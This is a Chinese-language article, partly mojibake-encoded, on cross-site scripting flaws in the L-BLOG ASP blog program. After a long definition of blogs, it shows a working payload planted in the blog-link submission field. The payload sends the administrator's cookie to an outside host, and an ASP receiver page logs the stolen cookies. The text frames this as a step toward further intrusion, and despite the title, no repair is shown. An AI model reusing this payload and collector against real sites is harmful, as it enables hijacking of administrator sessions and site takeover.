L-BLOG 漏洞介紹及修復(fù)(圖)
首先說說的是什么是blog(博客)?因?yàn)楹芏嗳硕疾恢纀log是什么?就算看完了這篇文章都不明白,所以浪費(fèi)一些篇幅!
釋義:
網(wǎng)絡(luò)出版(Web Publishing)、發(fā)表和張貼(Post——這個(gè)字當(dāng)名詞用時(shí)就是指張貼的文章)文章是個(gè)急速成長(zhǎng)的網(wǎng)絡(luò)活動(dòng),現(xiàn)在甚至出現(xiàn)了一個(gè)用來指稱這種網(wǎng)絡(luò)出版和發(fā)表文章的專有名詞——Weblog,或Blog。一個(gè)Blog就是一個(gè)網(wǎng)頁,它通常是由簡(jiǎn)短且經(jīng)常更新的Post所構(gòu)成;這些張貼的文章都按照年份和日期排列。Blog的內(nèi)容和目的有很大的不同,從對(duì)其他網(wǎng)站的超級(jí)鏈接和評(píng)論,有關(guān)公司、個(gè)人、構(gòu)想的新聞到日記、照片、詩歌、散文,甚至科幻小說的發(fā)表或張貼都有。許多Blogs是個(gè)人心中所想之事情的發(fā)表,其它Blogs則是一群人基于某個(gè)特定主題或共同利益領(lǐng)域的集體創(chuàng)作。Blog好象對(duì)網(wǎng)絡(luò)傳達(dá)的實(shí)時(shí)訊息。撰寫這些Weblog或Blog的人就叫做Blogger或Blog writer。在網(wǎng)絡(luò)上發(fā)表Blog的構(gòu)想使于1998年,但到了2000年才真正開始流行。起初,Bloggers將其每天瀏覽網(wǎng)站的心得和意見記錄下來,并予以公開,來給其它人參考和遵循。但隨著Blogging快速擴(kuò)張,它的目的與最初已相去甚遠(yuǎn)。目前網(wǎng)絡(luò)上數(shù)以千計(jì)的 Bloggers發(fā)表和張貼Blog的目的有很大的差異。不過,由于溝通方式比電子郵件、討論群組更簡(jiǎn)單和容易,Blog已成為家庭、公司、部門和團(tuán)隊(duì)之間越來越盛行的溝通工具,因?yàn)樗仓饾u被應(yīng)用在企業(yè)內(nèi)部網(wǎng)絡(luò)(Intranet)。
現(xiàn)在在網(wǎng)絡(luò)上使用的blog程序大致分為多用戶和單用戶兩個(gè)版本,ASP的Blog程序以及版本都比較多,自然而然的就會(huì)存在著各種各樣的漏洞??!現(xiàn)在主流的ASP Blog程序有以下幾種:
1.L-BLOG (Loveyuki編寫的ASP+ACCESS架構(gòu)),這個(gè)程序的修改以及美化版本N多
2.O-BLOG(葉開編寫的ASP+ACCESS/SQL架構(gòu)多用戶)
3.Misslong(多用戶版本)
4.theanswer‘s blog(外國(guó)開源網(wǎng)站項(xiàng)目程序,代碼謹(jǐn)慎簡(jiǎn)潔)
5.SIC's blog(L-BLOG的修改版本,安全性能都比原作強(qiáng))
6.Dlong(豬飛飛編寫的程序?qū)儆诒容^早的blog程序,停止開發(fā)了)
我就拿L-BLOG程序來進(jìn)行分析!看看我們的L-BLOG有多少問題?
一.L-BLOG程序漏洞.(跨站式腳本漏洞)
使用最廣的程序就會(huì)有更多的漏洞存在,我們L-BLOG程序也是一樣?。?!首先看看的就是基本的漏洞跨站式腳本漏洞,在Member.asp/favorite.asp/bloglinks.asp頁面里面發(fā)現(xiàn),作者并沒有為了防止跨站腳本的漏洞,所以完全沒有過濾到任何的敏感字符,借此我們就可以進(jìn)行COOKIE的盜取,以及對(duì)于BLOG的破壞了!
我們就拿Member.asp頁面的“個(gè)人主頁”欄目設(shè)置作為例子,我們發(fā)現(xiàn)只要輸入特定惡意代碼,這樣子就可以拿到管理員的COOKIE或者進(jìn)行破壞!例如:<script>alert("TEST.BY.H4K_B4N");</script>在個(gè)人主頁欄目的時(shí)候
當(dāng)管理員或者其他用戶查看我們?cè)O(shè)定的帳號(hào)資料的時(shí)候,代碼的就會(huì)啟動(dòng),這樣子就完成了跨展腳本的攻擊了!
在三個(gè)頁面當(dāng)中危害性最大的就是bloglinks.asp添加連接頁面,只要在申請(qǐng)連接的地址輸入惡意代碼,就可以直接拿到管理員的COOKIE了,因?yàn)槊總€(gè)連接都需要經(jīng)過管理員的審核才可以,這樣子每當(dāng)管理員登陸admincp.asp管理后臺(tái)的相關(guān)頁面就會(huì)啟動(dòng)代碼從而得到我們需要的COOKIE了!
代碼如下:
<script> document.location='http://yoursite.com/cookie.asp?'%2Bdocument.cookie
</script>
COOKIE頁面代碼:
<%
Testfile=server.mappath("info.txt")
Msg=request.servervariables("QUERY_STRING")
Set fs=server.createobject("scripting.filesystemobject")
Set thisfile=fs.opentextfile(testfile,8,true,0)
Thidfile.writeline(""&msg&"")
Thisfile.close
Set fs=nothing
%>
利用以上的代碼,我們就可以很輕松的拿到管理員的COOKIE資料,進(jìn)行進(jìn)一步的入侵了。
相關(guān)文章
誘人視頻請(qǐng)君入甕 解析RealPlayer溢出漏洞
誘人視頻請(qǐng)君入甕 解析RealPlayer溢出漏洞...2007-01-01細(xì)說3721網(wǎng)絡(luò)實(shí)名“病毒”
細(xì)說3721網(wǎng)絡(luò)實(shí)名“病毒”...2007-01-01從搜索參數(shù)過濾不嚴(yán)到IDC虛擬主機(jī)的滲透
從搜索參數(shù)過濾不嚴(yán)到IDC虛擬主機(jī)的滲透...2007-01-01Sql Injection in DB2數(shù)據(jù)庫
Sql Injection in DB2數(shù)據(jù)庫...2007-01-01